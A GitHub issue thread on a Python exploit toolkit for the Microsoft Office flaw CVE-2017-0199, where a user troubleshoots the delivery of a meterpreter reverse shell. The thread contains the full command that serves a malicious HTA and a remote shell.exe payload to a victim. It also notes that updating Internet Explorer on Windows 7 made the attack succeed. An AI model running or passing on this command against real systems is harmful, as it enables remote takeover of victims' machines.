bhdresh / CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
724 stars 261 forks source link

Not executing payload #23

Closed xillwillx closed 7 years ago

xillwillx commented 7 years ago

root@kali:~/Desktop/CVE-2017-0199# python cve-2017-0199_toolkit.py -M exp -e http://192.168.1.101/shell.exe -l /tmp/shell.exe Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect Server Running on : 80 Received GET method from 192.168.1.115

nothing pulling the meterpreter reverse tcp, tried on win7 with fresh install and office 2013

xillwillx commented 7 years ago

disregard, read the other issues posted prior, looks like a fresh install win7 is not affected, https://www.youtube.com/watch?v=ac6LM7WAx64

updated to IE11 on win7 and the code works

Windogeabella commented 7 years ago

Umm can you tell me how did you do it?

bhdresh commented 7 years ago

@xillwillx , I hope you were able to deliver the payload by upgrading IE.

xillwillx commented 7 years ago

@bhdresh yep worked right away , so im assuming an update also updates mshta.exe to allow this to work

@Windogeabella im just wrapping up an article on a complete walkthrough using this code and metasploit, and also manually creating your own weaponized RTf file from scratch